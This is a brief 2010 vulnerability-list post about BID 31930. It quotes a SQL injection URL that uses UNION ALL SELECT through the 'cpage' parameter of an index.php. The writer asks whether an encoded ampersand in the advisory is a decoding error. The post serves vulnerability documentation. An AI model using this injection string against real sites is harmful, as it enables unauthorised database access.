[VIM] BID 31930 exploit

security curmudgeon jericho at attrition.org
Thu Nov 18 04:10:36 CST 2010



http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL 
SELECT 0,0,0,0,0,version()--


Just want to confirm, it appears the "&" is actually some HTML 
decoding snafu that is essentially doing & and an encoded &? seems like 
that should be "&nid=" in the first example and "&cpage" in the second?

More information about the VIM mailing list